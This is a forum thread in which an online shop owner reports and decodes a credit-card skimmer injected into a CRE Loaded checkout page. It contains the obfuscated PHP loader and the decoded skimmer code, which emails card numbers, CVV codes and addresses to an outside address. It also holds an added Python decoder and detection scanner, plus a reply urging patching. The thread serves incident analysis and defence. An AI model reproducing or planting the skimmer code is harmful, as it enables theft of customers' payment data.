graith Posted August 31, 2010

I found this code in checkout_confirmation.php

    require(DIR_WS_INCLUDES . 'inc_lib.php');

which looks like this.

    <?
    function d($s,$k=''){
        if($k==''){
            // no key: decode a hex string into text (used to hide function names)
            for($i=0;$i<strlen($s);$i){
                $d.=chr(hexdec(substr($s,$i,2)));
                $i=(float)($i)+2;
            }
            return $d;
        }else{
            $r='';
            $f=d('6261736536345f6465636f6465'); // hex for "base64_decode"
            $u=$f('Z3ppbmZsYXRl');               // base64 for "gzinflate"
            $s=$u($f($s));                       // gzinflate(base64_decode($s))
            for($i=0;$i<strlen($s);$i++){
                // subtract a key character from each byte; the key is the integer below
                $c=substr($s,$i,1);
                $kc=substr($k,($i%strlen($k))-1,1);
                $c=chr(ord($c)-ord($kc));
                $r.=$c;
            }
            return $r;
        }
    }
    eval(d("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",864930819));
    ?>

Decoding it turns it into this

    if((isset($v) AND $v==0) OR (isset($t) AND $t==false)){die('');}
    $first_name = $_POST['cc_owner'];
    $ccnum = $_POST['cc_number'];
    $ccstart1 = $_POST['cc_start_month'];
    $ccstart2 = $_POST['cc_start_year'];
    $cvv2 = $_POST['cc_ccv'];
    $exp1 = $_POST['cc_expires_month'];
    $exp2 = $_POST['cc_expires_year'];
    $issue = $_POST['cc_issue'];
    $add = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', '---');
    $phone = $order->customer['telephone'];
    $email = $order->customer['email_address'];
    $street = $order->customer['street_address'];
    $city = $order->customer['city'];
    $state = $order->customer['state'];
    $zip = $order->customer['postcode'];
    $ip = $_SERVER["REMOTE_ADDR"];
    $msg = "Email: $email\nstreet: $street\ncity: $city\nState: $state\nzip: $zip\nPhone: $phone Name: $first_name\nCcnumber: $ccnum\nExpdate: $exp1/$exp2\nCVV: $cvv2\nStart: $ccstart1/$ccstart1\nIssue: $issue IP: $ip\nAddress: $add";
    $to="[email protected]";
    $subj = "HEY BABY";
    $from ="From: [email protected]";
    mail ($to, $subj, $msg, $from);

Its job is to email the credit card details to the email address [email protected] with subject HEY BABY. It'd be a great shame if he got 10,000 emails from [email protected] with that subject, or if that email address was submitted to some obnoxious email feed. I've no idea how the site was hacked.
It's a version of CRE Loaded and the admin directory is password protected. Every file had its date and time stamp set to November 2007, so we can't trace exactly when it was done. We've turned off accepting credit card payment and we'll have to use a payment provider instead.

Graith
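A defender-side reimplementation of the d() routine from the injected inc_lib.php above, added here as an analysis example and not code from the original post or from CRE Loaded. It decodes both modes the loader uses (hex-hidden function names, and base64 + gzinflate + per-byte key subtraction) and includes a small scanner that flags the eval(d("...", key)) pattern in PHP source. The encode_payload helper and the sample plaintext exist only so the example can be exercised offline; the key handling mirrors PHP semantics (integer key coerced to its digits, substr() index -1 meaning the last character, chr() wrapping modulo 256).

```python
import base64
import re
import zlib

# Mode 1 of d(): no key -> the string is hex pairs spelling a PHP function name.
def decode_hex(s: str) -> str:
    return bytes.fromhex(s).decode("latin-1")

# Mode 2 of d(): key given -> base64_decode -> gzinflate (raw DEFLATE) -> subtract a key byte.
# PHP's substr($k, ($i % strlen($k)) - 1, 1) pairs byte i with key[(i - 1) % len(key)],
# because index -1 selects the last character of the key.
def decode_payload(s: str, key) -> str:
    k = str(key).encode()                                # PHP coerces the integer key to "864930819"
    raw = zlib.decompress(base64.b64decode(s), -15)      # wbits=-15 is raw DEFLATE, like gzinflate()
    out = bytearray()
    for i, c in enumerate(raw):
        kc = k[(i - 1) % len(k)]
        out.append((c - kc) % 256)                       # PHP chr() wraps negative values modulo 256
    return out.decode("latin-1")

# Inverse of decode_payload; constructed here only to build an offline test fixture.
def encode_payload(plain: str, key) -> str:
    k = str(key).encode()
    shifted = bytes((c + k[(i - 1) % len(k)]) % 256
                    for i, c in enumerate(plain.encode("latin-1")))
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(shifted) + comp.flush()).decode()

# The loader line as it appeared in the infected file: eval(d("<base64>", <integer key>))
EVAL_RE = re.compile(r'eval\s*\(\s*d\s*\(\s*"([A-Za-z0-9+/=]+)"\s*,\s*(\d+)\s*\)\s*\)')
HEXNAME_RE = re.compile(r"\bd\('[0-9a-f]{8,}'\)")       # d('6261...') style hidden function names

# Recover the plaintext of every eval(d(...)) loader found in a PHP file's source.
def recover_eval_payloads(php_source: str) -> list:
    return [decode_payload(b64, int(key)) for b64, key in EVAL_RE.findall(php_source)]

# Cheap triage check: either the eval loader or hex-hidden function names is a strong indicator.
def is_suspicious_php(php_source: str) -> bool:
    return bool(EVAL_RE.search(php_source) or HEXNAME_RE.search(php_source))
```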
Guest Posted August 31, 2010

Brian,

Unless your site was PCI DSS compliant, you should not have been accepting credit cards anyway. Ensure your site is V2.2 RC2a and has ALL of the security patches and suggested Security Contributions installed to avoid any future security breaches.

Chris